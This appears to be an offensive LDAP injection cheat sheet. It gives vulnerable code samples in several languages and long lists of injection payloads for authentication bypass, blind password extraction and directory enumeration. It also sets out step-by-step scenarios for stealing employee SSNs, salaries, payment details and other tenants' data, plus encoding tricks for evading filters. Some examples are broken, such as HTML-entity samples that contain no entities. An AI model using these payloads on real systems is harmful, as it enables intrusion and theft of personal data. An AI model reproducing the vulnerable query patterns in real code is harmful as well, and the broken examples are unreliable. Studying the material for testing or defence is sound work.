LDAP injection

Before you start, it is very recommended to have basics of LDAP query/filter syntax and Distinguished Names (DNs), how applications construct and escape LDAP queries from user input, and the basics of directory service authentication/authorization. This part may seem long, and its sections are built to be sequentially starting from the beginner level up to some advanced stuff, feel free to navigate to whatever topic you want. hack fun :)

---

Understanding LDAP Injection

What is LDAP Injection?

LDAP (Lightweight Directory Access Protocol) injection is a security vulnerability that occurs when user-supplied input is incorporated into LDAP statements without proper validation or sanitization. This allows attackers to manipulate LDAP queries to access unauthorized information, bypass authentication, or modify directory data.

Vulnerable Code Example

// PHP vulnerable LDAP authentication
$username = $_POST['username'];
$password = $_POST['password'];

$ldap_filter = "(&(uid=$username)(userPassword=$password))";
$result = ldap_search($ldap_conn, $base_dn, $ldap_filter);

if (ldap_count_entries($ldap_conn, $result) > 0) {
    echo "Authentication successful";
} else {
    echo "Authentication failed";
}

Normal Request:

• Username: john

• Password: secret123

• Filter: (&(uid=john)(userPassword=secret123))

Malicious Request:

• Username: admin)(&(uid=admin

• Password: anything

• Filter: (&(uid=admin)(&(uid=admin)(userPassword=anything))

How LDAP Injection Works

LDAP injection exploits the way applications construct LDAP search filters and bind operations. When user input is directly concatenated into LDAP queries without proper escaping, attackers can inject LDAP special characters to modify the query logic.

LDAP Query Structure

Basic LDAP Filter Syntax:

• (attribute=value) - Equality filter

• (!(attribute=value)) - Negation filter

• (&(filter1)(filter2)) - AND operation

• (|(filter1)(filter2)) - OR operation

• (attribute=value*) - Wildcard matching

• (attribute>=value) - Greater than or equal

• (attribute<=value) - Less than or equal

Impact and Consequences

• Authentication Bypass - Access without valid credentials

• Information Disclosure - Enumeration of directory data

• Privilege Escalation - Access to administrative accounts

• Data Modification - Unauthorized changes to directory entries

• Denial of Service - Malformed queries causing service disruption

LDAP Special Characters and Metacharacters

Understanding LDAP special characters is crucial for both exploitation and defense:

Filter Metacharacters

• ( - Start of filter

• ) - End of filter

• & - AND operator

• | - OR operator

• ! - NOT operator

• * - Wildcard character

• \ - Escape character

• = - Equality operator

• >= - Greater than or equal

• <= - Less than or equal

• ~= - Approximate match

Distinguished Name (DN) Special Characters

• , - Separator between RDN components

• = - Separator between attribute and value

• + - Multi-valued RDN separator

• " - Quoted string delimiter

• \ - Escape character

• ; - Alternative separator (deprecated)

• < - Less than symbol

• > - Greater than symbol

---

Detection Methodology

Identifying Vulnerable Parameters

Common LDAP Integration Points

Authentication Systems:

• Login forms

• Password reset mechanisms

• User registration

• Single Sign-On (SSO) implementations

• Multi-factor authentication

User Management:

• User search functionality

• Profile management

• Group membership queries

• Permission verification

• User enumeration features

Application Integration:

• Employee directories

• Contact lists

• Organizational charts

• Access control systems

• Email address lookups

Vulnerable Function Patterns

PHP LDAP Functions:

• ldap_search()

• ldap_list()

• ldap_read()

• ldap_bind()

• ldap_compare()

• ldap_modify()

• ldap_add()

• ldap_delete()

Java LDAP Functions:

• DirContext.search()

• LdapContext.search()

• InitialDirContext.search()

• LdapTemplate.search()

• LdapTemplate.authenticate()

ASP.NET LDAP Functions:

• DirectorySearcher.Filter

• DirectoryEntry.Path

• PrincipalSearcher.QueryFilter

• DirectoryServices.Search()

Basic Detection Techniques

Authentication Bypass Testing

AND Logic Bypass:

# Test various AND bypass techniques
username: admin)(&(uid=admin
password: anything

username: admin))%00
password: anything

username: admin)|(uid=*
password: anything

OR Logic Injection:

# Inject OR conditions
username: *)(uid=*)|(uid=*
password: anything

username: admin)|(|(uid=admin
password: anything

username: *)(|(objectClass=*
password: anything

Wildcard Injection:

# Use wildcards for authentication bypass
username: *
password: *

username: admin*
password: *

username: a*
password: *

Boolean-Based Testing

True/False Conditions:

# Test boolean responses
username: admin)(&(1=1
password: anything

username: admin)(&(1=2
password: anything

# Check response differences
username: admin)(&(objectClass=person
password: anything

username: admin)(&(objectClass=invalidclass
password: anything

Existence Testing:

# Test attribute existence
username: admin)(&(uid=*
password: anything

username: admin)(&(mail=*
password: anything

username: admin)(&(telephoneNumber=*
password: anything

Error-Based Detection

Syntax Error Injection:

# Generate LDAP syntax errors
username: admin)(
password: anything

username: admin))
password: anything

username: admin)(&
password: anything

username: admin)(&(
password: anything

Invalid Filter Testing:

# Invalid filter constructions
username: admin)(&(invalid
password: anything

username: admin)(&(=value
password: anything

username: admin)(&(attr=
password: anything

Advanced Detection Techniques

Blind LDAP Injection

Time-Based Detection:

# Time-based testing (server-dependent)
username: admin)(&(cn=admin*)(cn=a*
password: anything

username: admin)(&(cn=admin*)(cn=b*
password: anything

# Character-by-character enumeration
username: admin)(&(userPassword=a*
password: anything

username: admin)(&(userPassword=b*
password: anything

Content-Length Based:

# Response size analysis
username: *
password: anything

username: a*
password: anything

username: admin*
password: anything

# Monitor response sizes for information leakage

Attribute Enumeration

Common Attribute Testing:

# Test for standard LDAP attributes
username: admin)(&(mail=*
password: anything

username: admin)(&(telephoneNumber=*
password: anything

username: admin)(&(department=*
password: anything

username: admin)(&(title=*
password: anything

username: admin)(&(employeeNumber=*
password: anything

Custom Attribute Discovery:

# Application-specific attributes
username: admin)(&(customField=*
password: anything

username: admin)(&(permissions=*
password: anything

username: admin)(&(role=*
password: anything

username: admin)(&(accessLevel=*
password: anything

---

Authentication Bypass Techniques

AND Logic Manipulation

Basic AND Bypass

Filter Structure Manipulation:

# Original filter: (&(uid=username)(userPassword=password))

# Bypass technique 1
username: admin)(&(uid=admin
password: anything
# Result: (&(uid=admin)(&(uid=admin)(userPassword=anything))

# Bypass technique 2
username: admin))%00
password: anything
# Result: (&(uid=admin))%00)(userPassword=anything))

# Bypass technique 3
username: admin)(&(objectClass=*
password: anything
# Result: (&(uid=admin)(&(objectClass=*)(userPassword=anything))

Comment-Based Bypass:

# Using null byte or comment injection
username: admin%00
password: anything

username: admin#
password: anything

# Some implementations may ignore content after null byte

Advanced AND Manipulation

Nested Filter Injection:

# Complex nested filter manipulation
username: admin)(&(|(uid=admin)(uid=root
password: anything
# Result: (&(uid=admin)(&(|(uid=admin)(uid=root)(userPassword=anything))

# Multiple condition injection
username: admin)(&(uid=admin)(&(objectClass=person
password: anything
# Result: (&(uid=admin)(&(uid=admin)(&(objectClass=person)(userPassword=anything))

OR Logic Exploitation

Basic OR Injection

Always True Conditions:

# OR with wildcard (always true)
username: *)(uid=*)|(uid=*
password: anything
# Result: (&(uid=*)(uid=*)|(uid=*)(userPassword=anything))

# OR with object class
username: admin)|(objectClass=*
password: anything
# Result: (&(uid=admin)|(objectClass=*)(userPassword=anything))

# OR with always true condition
username: admin)|(uid=*
password: anything
# Result: (&(uid=admin)|(uid=*)(userPassword=anything))

Multi-User Bypass

Targeting Multiple Accounts:

# Target multiple administrative accounts
username: admin)|(uid=administrator)|(uid=root
password: anything

# Target any privileged user
username: admin)|(memberOf=cn=admins,ou=groups,dc=example,dc=com
password: anything

# Target any user with email
username: admin)|(mail=*
password: anything

Wildcard Exploitation

Universal Wildcards

Complete Wildcard Bypass:

# Universal access attempt
username: *
password: *

# Single character wildcard
username: ?
password: ?

# Partial wildcard matching
username: a*
password: *

username: admin*
password: *

Targeted Wildcard Attacks

Specific User Targeting:

# Target users starting with 'admin'
username: admin*
password: *

# Target specific user patterns
username: service*
password: *

username: test*
password: *

# Target by department
username: *)(&(department=IT*
password: anything

---

Information Disclosure Techniques

User Enumeration

Username Discovery

Alphabetic Enumeration:

# Enumerate usernames by starting letter
username: a*
username: b*
username: c*
# ... continue through alphabet

# Two-character enumeration
username: aa*
username: ab*
username: ac*
# ... more granular enumeration

Pattern-Based Discovery:

# Common username patterns
username: admin*
username: user*
username: test*
username: service*
username: guest*

# Email-based usernames
username: *.smith*
username: *.john*
username: *.admin*

Account Information Extraction

Personal Information:

# Extract user details
username: admin)(&(mail=*@company.com*
password: anything

username: admin)(&(telephoneNumber=555*
password: anything

username: admin)(&(cn=John*
password: anything

username: admin)(&(sn=Smith*
password: anything

Organizational Information:

# Department enumeration
username: admin)(&(department=*
password: anything

username: admin)(&(ou=*
password: anything

# Job title extraction
username: admin)(&(title=*Manager*
password: anything

username: admin)(&(title=*Director*
password: anything

Group and Permission Discovery

Group Membership Enumeration

Administrative Groups:

# Discover admin group members
username: admin)(&(memberOf=*admin*
password: anything

username: admin)(&(memberOf=*root*
password: anything

username: admin)(&(memberOf=*wheel*
password: anything

# Enumerate group DNs
username: admin)(&(memberOf=cn=*,ou=groups*
password: anything

Department Groups:

# Department-based groups
username: admin)(&(memberOf=*IT*
password: anything

username: admin)(&(memberOf=*HR*
password: anything

username: admin)(&(memberOf=*Finance*
password: anything

username: admin)(&(memberOf=*Security*
password: anything

Permission Structure Discovery

Access Control Attributes:

# Permission-related attributes
username: admin)(&(accessRights=*
password: anything

username: admin)(&(permissions=*
password: anything

username: admin)(&(role=*
password: anything

username: admin)(&(privilegeLevel=*
password: anything

Security Clearance:

# Security level enumeration
username: admin)(&(securityClearance=*
password: anything

username: admin)(&(accessLevel=*
password: anything

username: admin)(&(classification=*
password: anything

---

Application-Specific LDAP Injection

Authentication Systems

Single Sign-On (SSO) Bypass

SAML-Based SSO:

# SAML assertion manipulation
username: admin)(&(uid=admin)(!(disabled=*
password: anything

# NameID injection
username: admin@company.com)(&(mail=admin@company.com*
password: anything

# Attribute-based bypass
username: admin)(&(role=administrator*
password: anything

OAuth/OpenID Integration:

# OAuth attribute injection
username: admin)(&(oauth_id=*
password: anything

# Social media integration bypass
username: admin)(&(facebook_id=*
password: anything

username: admin)(&(google_id=*
password: anything

Multi-Factor Authentication

MFA Bypass Attempts:

# Bypass MFA requirements
username: admin)(&(mfaEnabled=false*
password: anything

username: admin)(&(!(mfaRequired=*
password: anything

# Token-based MFA bypass
username: admin)(&(mfaToken=*
password: anything

Web Application Integration

User Search Functionality

Directory Search Injection:

<!-- Search form injection -->
<form action="/search" method="POST">
    <input name="searchTerm" value="smith)(&(uid=admin*" />
    <input name="department" value="*" />
</form>

Advanced Search Filters:

# Multi-field search injection
searchTerm: *)(&(department=IT)(&(title=Manager*
location: *
department: *

# Boolean search injection
searchTerm: smith)|(|(cn=admin*
criteria: name

Profile Management

Profile Update Injection:

# Profile field injection
firstName: John)(&(uid=admin*
lastName: *
email: user@company.com

# Description field injection
description: Employee)(&(role=administrator*
title: *
department: *

Contact Information:

# Phone number injection
phone: 555-1234)(&(mobile=*
address: *
zipcode: *

# Email injection
email: user@company.com)(&(mail=admin@*
alternateEmail: *

Enterprise Applications

Employee Directory Systems

Employee Lookup Injection:

# Employee ID injection
employeeId: 12345)(&(manager=*admin*
name: *
department: *

# Badge number injection
badgeNumber: B001)(&(accessLevel=*
building: *
floor: *

Organizational Chart:

# Manager hierarchy injection
manager: Smith)(&(title=*Director*
subordinate: *
reporting: *

# Team structure injection
team: Development)(&(lead=*
project: *
role: *

Customer Relationship Management

Customer Search Injection:

# Customer ID injection
customerId: CUST001)(&(status=VIP*
customerName: *
tier: *

# Account lookup injection
accountNumber: ACC123)(&(creditLimit=*
status: *
type: *

---

Advanced LDAP Injection Techniques

Blind LDAP Injection Exploitation

Character-by-Character Extraction

Password Enumeration:

# Extract password character by character
# Position 1
username: admin)(&(userPassword=a*
username: admin)(&(userPassword=b*
username: admin)(&(userPassword=c*
# ... continue until response indicates match

# Position 2 (assuming first character is 'p')
username: admin)(&(userPassword=pa*
username: admin)(&(userPassword=pb*
username: admin)(&(userPassword=pc*
# ... continue enumeration

Attribute Value Extraction:

# Extract email address
username: admin)(&(mail=a*
username: admin)(&(mail=admin@*
username: admin)(&(mail=admin@company*
username: admin)(&(mail=admin@company.com*

# Extract phone number
username: admin)(&(telephoneNumber=555*
username: admin)(&(telephoneNumber=555-1*
username: admin)(&(telephoneNumber=555-12*

Time-Based Extraction

Response Time Analysis:

# Large result set for timing
username: admin)(&(|(uid=a*)(uid=b*)(uid=c*
# vs small result set
username: admin)(&(uid=nonexistent*

# Complex query timing
username: admin)(&(memberOf=cn=admins,ou=groups,dc=example,dc=com*
# vs simple query
username: admin)(&(uid=admin*

Content-Length Analysis

Response Size Comparison:

# Different response sizes for valid vs invalid
username: *  # Large response (all users)
username: admin*  # Medium response (admin users)
username: adminnonexistent*  # Small response (no users)

# Incremental size analysis
username: a*  # Size for users starting with 'a'
username: ad*  # Size for users starting with 'ad'
username: adm*  # Size for users starting with 'adm'

Filter Injection Techniques

Complex Boolean Logic

Nested AND/OR Combinations:

# Complex nested logic
username: admin)(&(|(uid=admin)(uid=root))(&(objectClass=person*
password: anything

# Multiple condition chaining
username: admin)(&(uid=admin)(&(!(disabled=true))(&(active=true*
password: anything

# Conditional attribute testing
username: admin)(&(|(department=IT)(department=Security))(&(role=admin*
password: anything

Approximation Attacks

Fuzzy Matching Exploitation:

# Approximate match operator (~=)
username: admin)(&(cn~=administrator*
password: anything

username: admin)(&(mail~=admin@company*
password: anything

# Phonetic matching (if supported)
username: admin)(&(sn~=smith*
password: anything

Range-Based Attacks

Numeric Range Exploitation:

# Employee ID ranges
username: admin)(&(employeeId>=1000*
password: anything

username: admin)(&(employeeId<=9999*
password: anything

# Date-based ranges
username: admin)(&(createTimestamp>=20230101000000Z*
password: anything

username: admin)(&(modifyTimestamp<=20231231235959Z*
password: anything

Protocol-Specific Techniques

LDAPS (LDAP over SSL/TLS)

Certificate-Based Attacks:

# Certificate subject injection
username: admin)(&(userCertificate;binary=*
password: anything

# Certificate serial number
username: admin)(&(certificateSerialNumber=*
password: anything

LDAP Referrals

Referral Manipulation:

# Referral URL injection
username: admin)(&(ref=ldap://malicious.server/*
password: anything

# Cross-domain referral
username: admin)(&(ref=ldap://target.domain/dc=target,dc=domain*
password: anything

Extended Operations

Extended Request Injection:

# Password modify extended operation
username: admin)(&(pwdChangedTime=*
password: anything

# Start TLS injection
username: admin)(&(supportedExtension=1.3.6.1.4.1.1466.20037*
password: anything

---

Platform-Specific LDAP Injection

Active Directory Exploitation

Active Directory Specific Attributes

AD-Specific Enumeration:

# samAccountName injection
username: admin)(&(samAccountName=administrator*
password: anything

# userPrincipalName injection
username: admin)(&(userPrincipalName=admin@domain.com*
password: anything

# distinguishedName injection
username: admin)(&(distinguishedName=CN=Administrator,CN=Users,DC=domain,DC=com*
password: anything

Security Identifier (SID) Attacks:

# objectSid enumeration
username: admin)(&(objectSid=S-1-5-21-*500
password: anything

# Well-known SID injection
username: admin)(&(objectSid=S-1-5-32-544*  # Local Administrators
password: anything

username: admin)(&(objectSid=S-1-5-32-548*  # Account Operators
password: anything

Group Policy and Permissions

Group Policy Object (GPO) Injection:

# GPO link discovery
username: admin)(&(gPLink=*
password: anything

# Group policy enumeration
username: admin)(&(objectClass=groupPolicyContainer*
password: anything

# GPO permissions
username: admin)(&(nTSecurityDescriptor=*
password: anything

Access Control List (ACL) Exploitation:

# ACL enumeration
username: admin)(&(nTSecurityDescriptor=*ADMIN*
password: anything

# Permission inheritance
username: admin)(&(inheritanceFlags=*
password: anything

# Extended rights
username: admin)(&(rightsGuid=*
password: anything

Domain Trust Relationships

Trust Enumeration:

# Trusted domain discovery
username: admin)(&(trustPartner=*
password: anything

# Trust direction
username: admin)(&(trustDirection=*
password: anything

# Cross-domain user enumeration
username: admin)(&(userPrincipalName=*@trusted.domain*
password: anything

OpenLDAP Exploitation

OpenLDAP Schema Exploitation

Schema Discovery:

# Attribute type enumeration
username: admin)(&(attributeTypes=*
password: anything

# Object class discovery
username: admin)(&(objectClasses=*
password: anything

# Supported extensions
username: admin)(&(supportedExtension=*
password: anything

Access Control Information (ACI):

# ACI enumeration
username: admin)(&(aci=*
password: anything

# Access control policy
username: admin)(&(aclRights=*
password: anything

# Permission targets
username: admin)(&(targetattr=*
password: anything

OpenLDAP Overlays

ppolicy Overlay Exploitation:

# Password policy attributes
username: admin)(&(pwdPolicySubentry=*
password: anything

# Password history
username: admin)(&(pwdHistory=*
password: anything

# Account lockout status
username: admin)(&(pwdAccountLockedTime=*
password: anything

memberof Overlay:

# Dynamic group membership
username: admin)(&(memberOf=*
password: anything

# Reverse group lookup
username: admin)(&(member=*admin*
password: anything

389 Directory Server

389 DS Specific Features

Role-Based Access Control:

# Role enumeration
username: admin)(&(nsRole=*
password: anything

# Role definition
username: admin)(&(objectClass=nsRoleDefinition*
password: anything

# Managed roles
username: admin)(&(objectClass=nsManagedRoleDefinition*
password: anything

Account Policy:

# Account inactivation
username: admin)(&(nsAccountLock=*
password: anything

# Password syntax checking
username: admin)(&(passwordCheckSyntax=*
password: anything

# Account policy state
username: admin)(&(accountUnlockTime=*
password: anything

Class of Service (CoS)

CoS Template Discovery:

# CoS template enumeration
username: admin)(&(objectClass=cosTemplate*
password: anything

# CoS definition
username: admin)(&(objectClass=cosSuperDefinition*
password: anything

# Indirect CoS
username: admin)(&(cosIndirectSpecifier=*
password: anything

---

Web Application Framework Integration

PHP LDAP Integration

PHP-Specific Vulnerabilities

Common PHP LDAP Patterns:

<?php
// Vulnerable authentication function
function authenticate($username, $password) {
    $ldap_conn = ldap_connect("ldap://ldap.company.com");
    
    // Vulnerable filter construction
    $filter = "(&(uid=$username)(userPassword=$password))";
    $search = ldap_search($ldap_conn, "dc=company,dc=com", $filter);
    
    return ldap_count_entries($ldap_conn, $search) > 0;
}

// Vulnerable user search
function searchUsers($searchTerm) {
    $ldap_conn = ldap_connect("ldap://ldap.company.com");
    
    // Vulnerable search filter
    $filter = "(|(cn=*$searchTerm*)(mail=*$searchTerm*))";
    $search = ldap_search($ldap_conn, "ou=users,dc=company,dc=com", $filter);
    
    return ldap_get_entries($ldap_conn, $search);
}
?>

PHP LDAP Injection Payloads:

# PHP-specific authentication bypass
username: admin)(%00(&(uid=admin
password: anything

# PHP null byte injection
username: admin%00)(&(uid=admin
password: anything

# PHP comment injection
username: admin#)(&(uid=admin
password: anything

PHP Framework Integration

Laravel LDAP Integration:

<?php
// Vulnerable Laravel LDAP authentication
use Adldap\Laravel\Facades\Adldap;

class AuthController extends Controller {
    public function authenticate(Request $request) {
        $username = $request->input('username');
        $password = $request->input('password');
        
        // Vulnerable LDAP query
        $user = Adldap::search()
            ->whereRaw("(&(samAccountName=$username)(userPassword=$password))")
            ->first();
            
        return $user ? 'success' : 'failed';
    }
}
?>

Java/Spring LDAP Integration

Spring LDAP Vulnerabilities

Spring LDAP Template:

// Vulnerable Spring LDAP authentication
@Service
public class LdapAuthenticationService {
    
    @Autowired
    private LdapTemplate ldapTemplate;
    
    public boolean authenticate(String username, String password) {
        // Vulnerable filter construction
        String filter = "(&(uid=" + username + ")(userPassword=" + password + "))";
        
        List<String> results = ldapTemplate.search(
            "ou=users",
            filter,
            new AttributesMapper<String>() {
                public String mapFromAttributes(Attributes attrs) {
                    return attrs.get("uid").toString();
                }
            }
        );
        
        return !results.isEmpty();
    }
}

Spring Security LDAP:

// Vulnerable Spring Security LDAP configuration
@Configuration
@EnableWebSecurity
public class SecurityConfig extends WebSecurityConfigurerAdapter {
    
    @Override
    protected void configure(AuthenticationManagerBuilder auth) throws Exception {
        auth.ldapAuthentication()
            .userSearchBase("ou=users")
            // Vulnerable user search filter
            .userSearchFilter("(uid={0})")
            .groupSearchBase("ou=groups")
            // Vulnerable group search filter
            .groupSearchFilter("(member={0})")
            .contextSource()
            .url("ldap://ldap.company.com:389/dc=company,dc=com");
    }
}

Java Enterprise Integration

JNDI LDAP Injection:

// Vulnerable JNDI LDAP lookup
public class UserService {
    public User findUser(String username) {
        try {
            InitialDirContext ctx = new InitialDirContext();
            
            // Vulnerable search filter
            String filter = "(&(objectClass=person)(uid=" + username + "))";
            SearchControls controls = new SearchControls();
            controls.setSearchScope(SearchControls.SUBTREE_SCOPE);
            
            NamingEnumeration<SearchResult> results = ctx.search(
                "ou=users,dc=company,dc=com", 
                filter, 
                controls
            );
            
            // Process results...
            return processResults(results);
        } catch (NamingException e) {
            throw new RuntimeException("LDAP search failed", e);
        }
    }
}

.NET/ASP.NET LDAP Integration

.NET DirectoryServices Vulnerabilities

DirectorySearcher Injection:

// Vulnerable .NET LDAP authentication
using System.DirectoryServices;

public class LdapAuthenticator {
    public bool Authenticate(string username, string password) {
        try {
            using (DirectoryEntry entry = new DirectoryEntry()) {
                entry.Path = "LDAP://ldap.company.com/dc=company,dc=com";
                
                using (DirectorySearcher searcher = new DirectorySearcher(entry)) {
                    // Vulnerable filter construction
                    searcher.Filter = $"(&(uid={username})(userPassword={password}))";
                    
                    SearchResult result = searcher.FindOne();
                    return result != null;
                }
            }
        } catch (Exception ex) {
            return false;
        }
    }
}

ASP.NET Identity Integration:

// Vulnerable ASP.NET Identity LDAP provider
public class LdapUserStore : IUserStore<ApplicationUser> {
    public async Task<ApplicationUser> FindByNameAsync(string userName) {
        using (DirectoryEntry entry = new DirectoryEntry()) {
            entry.Path = "LDAP://ldap.company.com/dc=company,dc=com";
            
            using (DirectorySearcher searcher = new DirectorySearcher(entry)) {
                // Vulnerable user search
                searcher.Filter = $"(samAccountName={userName})";
                
                SearchResult result = searcher.FindOne();
                if (result != null) {
                    return MapToApplicationUser(result);
                }
            }
        }
        return null;
    }
}

Node.js LDAP Integration

Node.js LDAP Libraries

ldapjs Vulnerabilities:

// Vulnerable Node.js LDAP authentication
const ldap = require('ldapjs');

function authenticate(username, password, callback) {
    const client = ldap.createClient({
        url: 'ldap://ldap.company.com:389'
    });
    
    // Vulnerable filter construction
    const filter = `(&(uid=${username})(userPassword=${password}))`;
    
    const opts = {
        filter: filter,
        scope: 'sub',
        attributes: ['uid', 'cn', 'mail']
    };
    
    client.search('dc=company,dc=com', opts, (err, res) => {
        let found = false;
        
        res.on('searchEntry', (entry) => {
            found = true;
        });
        
        res.on('end', () => {
            callback(null, found);
        });
        
        res.on('error', (err) => {
            callback(err, false);
        });
    });
}

// Vulnerable user search function
function searchUsers(searchTerm, callback) {
    const client = ldap.createClient({
        url: 'ldap://ldap.company.com:389'
    });
    
    // Vulnerable search filter
    const filter = `(|(cn=*${searchTerm}*)(mail=*${searchTerm}*))`;
    
    const opts = {
        filter: filter,
        scope: 'sub',
        attributes: ['uid', 'cn', 'mail', 'department']
    };
    
    client.search('ou=users,dc=company,dc=com', opts, (err, res) => {
        const results = [];
        
        res.on('searchEntry', (entry) => {
            results.push(entry.object);
        });
        
        res.on('end', () => {
            callback(null, results);
        });
    });
}

Passport.js LDAP Strategy:

// Vulnerable Passport LDAP strategy
const passport = require('passport');
const LdapStrategy = require('passport-ldapauth');

passport.use(new LdapStrategy({
    server: {
        url: 'ldap://ldap.company.com:389',
        bindDN: 'cn=admin,dc=company,dc=com',
        bindCredentials: 'admin_password',
        searchBase: 'ou=users,dc=company,dc=com',
        // Vulnerable search filter
        searchFilter: '(uid={{username}})',  // Should be escaped
        searchAttributes: ['uid', 'cn', 'mail']
    }
}, (user, done) => {
    return done(null, user);
}));

Express.js LDAP Integration

Express Route Vulnerabilities:

// Vulnerable Express.js LDAP endpoints
const express = require('express');
const ldap = require('ldapjs');
const app = express();

// Vulnerable login endpoint
app.post('/login', (req, res) => {
    const { username, password } = req.body;
    
    const client = ldap.createClient({
        url: 'ldap://ldap.company.com:389'
    });
    
    // Vulnerable filter - direct concatenation
    const filter = `(&(uid=${username})(userPassword=${password}))`;
    
    client.search('dc=company,dc=com', { filter }, (err, search) => {
        let authenticated = false;
        
        search.on('searchEntry', () => {
            authenticated = true;
        });
        
        search.on('end', () => {
            res.json({ success: authenticated });
        });
    });
});

// Vulnerable user search endpoint
app.get('/users/search', (req, res) => {
    const { query, department } = req.query;
    
    const client = ldap.createClient({
        url: 'ldap://ldap.company.com:389'
    });
    
    // Vulnerable multi-parameter filter
    const filter = `(&(|(cn=*${query}*)(mail=*${query}*))(department=${department}))`;
    
    client.search('ou=users,dc=company,dc=com', { filter }, (err, search) => {
        const results = [];
        
        search.on('searchEntry', (entry) => {
            results.push(entry.object);
        });
        
        search.on('end', () => {
            res.json(results);
        });
    });
});

---

Real-World Attack Scenarios

Enterprise SSO Bypass

Corporate Authentication System

Scenario: Large Enterprise SSO

# Target: Corporate SSO portal
# Vulnerable parameter: username field in login form

# Step 1: Identify LDAP injection point
POST /sso/authenticate
Content-Type: application/x-www-form-urlencoded

username=testuser&password=testpass

# Step 2: Test for injection
username=testuser)(&(uid=testuser&password=anything

# Step 3: Attempt authentication bypass
username=admin)(&(uid=admin&password=anything

# Step 4: Extract administrative accounts
username=*)(&(memberOf=*admin*&password=anything

# Step 5: Enumerate high-privilege users
username=*)(&(title=*director*&password=anything
username=*)(&(title=*manager*&password=anything
username=*)(&(department=security*&password=anything

Multi-Domain Environment

Cross-Domain Exploitation:

# Target: Multi-domain corporate environment
# Domains: corp.company.com, dev.company.com, prod.company.com

# Enumerate domains
username=admin)(&(userPrincipalName=*@corp.company.com*
username=admin)(&(userPrincipalName=*@dev.company.com*
username=admin)(&(userPrincipalName=*@prod.company.com*

# Cross-domain privilege escalation
username=admin)(&(memberOf=*,DC=corp,DC=company,DC=com*
username=admin)(&(memberOf=*,DC=dev,DC=company,DC=com*

# Service account discovery
username=svc*)(&(servicePrincipalName=*
username=service*)(&(objectClass=user*
username=*)(&(userAccountControl=*SERVICE*

Customer Portal Exploitation

SaaS Application Attack

Scenario: Multi-Tenant SaaS Platform

# Target: Customer portal with LDAP backend
# Goal: Access other customers' data

# Step 1: Identify tenant isolation
username=user@tenant1.com)(&(mail=*@tenant1.com*
password=anything

# Step 2: Attempt cross-tenant access
username=user@tenant1.com)(&(mail=*@tenant2.com*
password=anything

# Step 3: Enumerate all tenants
username=user@tenant1.com)(&(mail=*@*
password=anything

# Step 4: Target administrative accounts
username=user@tenant1.com)(&(mail=admin@*
username=user@tenant1.com)(&(mail=root@*
username=user@tenant1.com)(&(cn=*administrator*

# Step 5: Extract sensitive attributes
username=user@tenant1.com)(&(customerId=*
username=user@tenant1.com)(&(billingInfo=*
username=user@tenant1.com)(&(accountType=premium*

E-commerce Platform

Customer Account Takeover:

# Target: E-commerce customer accounts
# Goal: Account takeover and data extraction

# Customer enumeration
username=customer)(&(email=*@gmail.com*
username=customer)(&(email=*@yahoo.com*
username=customer)(&(email=*@hotmail.com*

# High-value customer targeting
username=customer)(&(accountType=premium*
username=customer)(&(loyaltyLevel=gold*
username=customer)(&(totalPurchases>=10000*

# Payment information discovery
username=customer)(&(paymentMethod=*
username=customer)(&(creditCardLast4=*
username=customer)(&(billingAddress=*

# Order history enumeration
username=customer)(&(lastOrderDate=*
username=customer)(&(orderCount>=*
username=customer)(&(favoriteCategory=*

Internal Directory Exploitation

HR System Attack

Employee Information Extraction:

# Target: HR management system
# Goal: Complete employee database extraction

# Basic employee enumeration
username=employee)(&(employeeType=fulltime*
username=employee)(&(employeeType=contractor*
username=employee)(&(employeeType=intern*

# Salary and compensation data
username=employee)(&(salary=*
username=employee)(&(payGrade=*
username=employee)(&(bonus=*
username=employee)(&(stockOptions=*

# Personal information extraction
username=employee)(&(ssn=*
username=employee)(&(dateOfBirth=*
username=employee)(&(emergencyContact=*
username=employee)(&(homeAddress=*

# Performance and review data
username=employee)(&(performanceRating=*
username=employee)(&(reviewDate=*
username=employee)(&(disciplinaryAction=*

IT Asset Management

Infrastructure Discovery:

# Target: IT asset management system
# Goal: Infrastructure mapping and security assessment

# Computer and server enumeration
username=admin)(&(objectClass=computer*
username=admin)(&(operatingSystem=Windows*
username=admin)(&(operatingSystem=Linux*
username=admin)(&(operatingSystem=*Server*

# Service account discovery
username=admin)(&(servicePrincipalName=HTTP/*
username=admin)(&(servicePrincipalName=MSSQL/*
username=admin)(&(servicePrincipalName=LDAP/*
username=admin)(&(servicePrincipalName=FTP/*

# Network infrastructure
username=admin)(&(dNSHostName=*.domain.com*
username=admin)(&(ipAddress=192.168.*
username=admin)(&(networkAddress=10.*

# Security groups and permissions
username=admin)(&(memberOf=*server*admin*
username=admin)(&(memberOf=*backup*operator*
username=admin)(&(memberOf=*domain*admin*

---

Advanced Evasion Techniques

Filter Encoding and Obfuscation

Character Encoding Methods

URL Encoding:

# Standard URL encoding
username: admin%29%28%26%28uid%3Dadmin
# Decoded: admin)(&(uid=admin

# Double URL encoding
username: admin%2529%2528%2526%2528uid%253Dadmin
# Decoded: admin)(&(uid=admin

# Mixed encoding
username: admin%29(&(uid%3Dadmin
# Partially encoded injection

Unicode Encoding:

# Unicode full-width characters
username: admin）（＆（uid＝admin
# Unicode alternatives for parentheses and operators

# Unicode normalization bypass
username: admin\u0029\u0028\u0026\u0028uid\u003Dadmin
# Unicode escape sequences

# Mixed Unicode and ASCII
username: admin）(&(uid=admin
# Combining different character sets

HTML Entity Encoding:

# HTML entity encoding
username: admin)(&(uid=admin
# Decimal entities

username: admin)(&(uid=admin
# Hexadecimal entities

# Mixed entity encoding
username: admin)(&(uid=admin
# Partial entity encoding

Alternative Representations

Case Variation:

# Mixed case attributes
username: admin)(&(UID=admin
username: admin)(&(Uid=admin
username: admin)(&(uId=admin

# Mixed case operators
username: admin)(&(uid=admin)(ObjectClass=person
username: admin)(&(uid=admin)(OBJECTCLASS=person

# Case-sensitive bypass attempts
username: ADMIN)(&(uid=admin
username: Admin)(&(uid=admin

Whitespace Manipulation:

# Extra whitespace
username: admin ) ( & ( uid = admin
username: admin)( &(uid=admin

# Tab characters
username: admin)(\t&\t(uid=admin
username: admin)\t(&(uid=admin

# Newline injection
username: admin)\n(&(uid=admin
username: admin)\r\n(&(uid=admin

Complex Filter Construction

Nested Filter Evasion

Deep Nesting:

# Multiple nesting levels
username: admin)(&(|(uid=admin)(|(cn=admin)(|(mail=admin*)(sn=admin*
password: anything

# Recursive filter construction
username: admin)(&(uid=admin)(&(uid=admin)(&(objectClass=person*
password: anything

# Complex boolean logic
username: admin)(&(|(!(disabled=true))(!(locked=true)))(&(active=true*
password: anything

Filter Fragmentation:

# Split across parameters
username: admin)(&(uid=admin
password: )(&(objectClass=person))(userPassword=anything

